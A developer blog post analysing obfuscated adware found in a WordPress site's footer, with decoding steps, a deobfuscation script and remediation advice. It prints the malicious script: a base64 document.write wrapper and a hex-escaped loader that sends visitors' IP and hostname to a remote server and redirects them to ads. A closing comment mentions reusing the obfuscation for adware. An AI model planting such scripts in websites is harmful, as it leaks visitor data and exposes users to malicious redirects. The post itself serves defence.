DEV Community

Mohamed Nabous

Unraveling the Cryptic Adware in a WordPress Site: A Journey into JavaScript Obfuscation

Introduction

The story began when I was asked to troubleshoot a client's WordPress website that was acting a bit weird. Pop-ups, sluggish behavior, you name it. Being familiar with a bit of grey hat tactics and having an instinctive sense of "code smell," I stumbled upon a mysterious piece of JavaScript code in the site's footer.

The Mysterious Code

Here's the initial snippet:

<script>document.write(atob("PHNjcmlwdD52YXIgXzB4OTJmYj1bIlx4NDRceDRGXHg0RFx4NDNceDZGXHg2RVx4NzRceDY1XHg2RVx4NzRceDRDXHg2Rlx4NjFceDY0XHg2NVx4NjQiLCJceDY4XHg2Rlx4NzNceDc0XHg2RVx4NjFceDZEXHg2NSIsIlx..."));</script>

Base64 encoding and document.write() in a place where it doesn't belong? That's already suspicious enough.

First Level Decryption

After decoding the Base64 string, I got yet another script:

<script>
  var _$_bf30 = [
    "\x2E",
    "\x2D",
    "\x72\x65\x70\x6C\x61\x63\x65\x41\x6C\x6C",
    "\x69\x70",
    "\x3A",
    "\x68\x6F\x73\x74\x6E\x61\x6D\x65",
    "\x6C\x6F\x63\x61\x74\x69\x6F\x6E",
    "",
    ...
  ];
  (function (_0xD070) {
    fetch(_$_bf30[21])
      [_$_bf30[15]]((_0xD0C7) => _0xD0C7[_$_bf30[16]]())
      [_$_bf30[15]]((_0xD175) => {
        _0xD175 = _0xD175[_$_bf30[3]][_$_bf30[2]](_$_bf30[0], _$_bf30[1]);
        _0xD175 = _0xD175[_$_bf30[2]](_$_bf30[4], _$_bf30[1]);
        let _0xD11E = window[_$_bf30[6]][_$_bf30[5]];
        if (_0xD11E == _$_bf30[7]) {
          _0xD11E = _$_bf30[8];
        }
        fetch(
          _$_bf30[17] +
            _0xD11E +
            _$_bf30[0] +
            _0xD175 +
            _$_bf30[0] +
            Math[_$_bf30[19]](Math[_$_bf30[18]]() * 1024 * 1024 * 10) +
            _$_bf30[20]
        )
          [_$_bf30[15]]((_0xD0C7) => _0xD0C7[_$_bf30[16]]())
          [_$_bf30[15]]((_0xD1CC) => {
              ...
            window[_$_bf30[6]][_$_bf30[14]](_0xD223);
          });
      });
  })();
</script>


It was wrapped in layers of obfuscation, clearly trying to hide its real intent.

Unpacking the Hexadecimal Strings

The code had an array of hex-escaped strings which, once decoded, turned out to be the property names, method names and URLs the script uses; every `_$_bf30[N]` lookup in the script is just an index into this array:

var _$_bf30 = [
    ".",
    "-",
    "replaceAll",
    "ip",
    ":",
    "hostname",
    "location",
    "",
    "unk.com",
    "Answer",
    ...
];
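As an added example (not the author's code and not the real payload), here is a small Node.js deobfuscator that automates the two steps above: it peels the `document.write(atob("..."))` wrapper and then inlines the hex-escaped string-array lookups, so that `window[_$_bf30[6]][_$_bf30[5]]` reads as `window.location.hostname`. The sample script, its array contents and the deliberately out-of-range index 8 are constructed for the demo.

```javascript
// Added example (not from the post): peel document.write(atob("...")) and inline the
// hex-escaped string-array lookups. Node.js assumed (Buffer stands in for atob).
// Constructed sample modeled on the page's snippet, not the real payload;
// index 8 is deliberately outside the array to mimic a truncated dump.
const SAMPLE_INNER = String.raw`<script>
var _$_bf30 = ["\x2E","\x2D","\x72\x65\x70\x6C\x61\x63\x65\x41\x6C\x6C","\x69\x70","\x3A",
  "\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E",""];
var h = window[_$_bf30[6]][_$_bf30[5]];
if (h == _$_bf30[7]) { h = _$_bf30[8]; }
var ip = h[_$_bf30[2]](_$_bf30[0], _$_bf30[1]);
</script>`;
const SAMPLE_OUTER = `<script>document.write(atob("${Buffer.from(SAMPLE_INNER, "latin1").toString("base64")}"));</script>`;

// Layer 1: return the decoded payload of document.write(atob("...")), or null if absent.
function peelAtobLayer(html) {
  const m = html.match(/document\.write\(\s*atob\(\s*"([A-Za-z0-9+/=]+)"\s*\)\s*\)/);
  return m ? Buffer.from(m[1], "base64").toString("latin1") : null;
}
// Turn "\x68\x6F..." escapes back into readable characters.
function decodeHexEscapes(s) {
  return s.replace(/\\x([0-9A-Fa-f]{2})/g, (_, hh) => String.fromCharCode(parseInt(hh, 16)));
}

// Layer 2a: locate `var NAME = [ "...", ... ];` and decode every entry.
function extractStringArray(js) {
  const m = js.match(/var\s+([A-Za-z_$][\w$]*)\s*=\s*\[([\s\S]*?)\];/);
  if (!m) return null;
  const values = [...m[2].matchAll(/"((?:[^"\\]|\\.)*)"/g)].map((x) => decodeHexEscapes(x[1]));
  return { name: m[1], values };
}

// Layer 2b: rewrite obj[NAME[i]] as obj.prop and a bare NAME[i] as a string literal.
function inlineArrayLookups(js, { name, values }) {
  const esc = name.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
  const re = new RegExp(`\\[${esc}\\[(\\d+)\\]\\]|${esc}\\[(\\d+)\\]`, "g");
  return js.replace(re, (whole, propIdx, valIdx) => {
    const i = Number(propIdx ?? valIdx);
    if (i >= values.length) return whole;           // unknown index: leave it visible
    const v = values[i];
    if (propIdx === undefined) return JSON.stringify(v);
    return /^[A-Za-z_$][\w$]*$/.test(v) ? `.${v}` : `[${JSON.stringify(v)}]`;
  });
}

// Full pipeline: outer base64 wrapper, then array resolution.
function deobfuscate(html) {
  const inner = peelAtobLayer(html) ?? html;
  const arr = extractStringArray(inner);
  return arr ? inlineArrayLookups(inner, arr) : inner;
}
```

Running `deobfuscate(SAMPLE_OUTER)` leaves any lookup whose index is missing from the (possibly truncated) array untouched, so you can see exactly which strings you still need to recover from the full dump.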

Understanding the Deobfuscated Code

After decoding the array and reading through the de-obfuscated JavaScript, the script appears to do the following:

  1. Fetch the visitor's public IP address from an external API (https://api64.ipify.org?format=json) and replace its dots and colons with dashes.
  2. Read window.location.hostname; if it is empty, fall back to a default ("unk.com" in this case).
  3. Build a URL from the hostname, the dashed IP and a random number, and fetch it from a suspicious domain.
  4. Unpack that response to obtain the ad URL and redirect the page to it.

Security Risks

  1. Data Leakage: The script sends the visitor's IP address and the site's hostname to a third party, which is a privacy invasion.
  2. Performance Impact: Unnecessary HTTP fetch requests are made on every page load, which slows down the website.
  3. Potential Malware: The final atob()-decoded string could be anything; the redirect target is chosen by the remote server and could serve malicious content to the user.

How to Handle Such Cases?

  1. Immediate Deactivation: The plugin or theme responsible should be immediately deactivated.
  2. Security Scan: Perform a full website scan with security plugins like Wordfence or Sucuri.
  3. Update and Patch: Ensure that all plugins, themes, and WordPress itself are legitimately licensed and obtained from official sources (no nulled or pirated copies), as well as up to date.
  4. Code Review: If you've added custom snippets, review the code or get it reviewed.
  5. Monitor: Keep an eye on the server logs for any abnormal activities.
  6. Client Communication: Keep your client in the loop throughout the process and advise them on the best security practices moving forward.

Conclusion

While the world of coding offers endless possibilities for creativity and innovation, it also harbors the potential for misuse. What I unraveled in that client's WordPress site is just the tip of the iceberg. With malicious actors becoming increasingly sophisticated, it's not enough to merely fix the issue at hand. We have to be proactive, not reactive.

Key Takeaways:

  1. Be Skeptical: If something seems off, it probably is. Listen to that gut feeling.
  2. Be Prepared: Always keep your software updated and invest in reliable security plugins.
  3. Educate: Make sure you and your clients are well-informed about the risks and how to mitigate them.

Remember, the safety of your web environment doesn't rest in the hands of some remote security expert; it starts with you. Don't be the weakest link. Stay alert, stay updated, and most importantly, stay safe.

Top comments (1)

MahmoudThePeltist

Great work! I'm going to start applying some of these obfuscation methods to my adware :)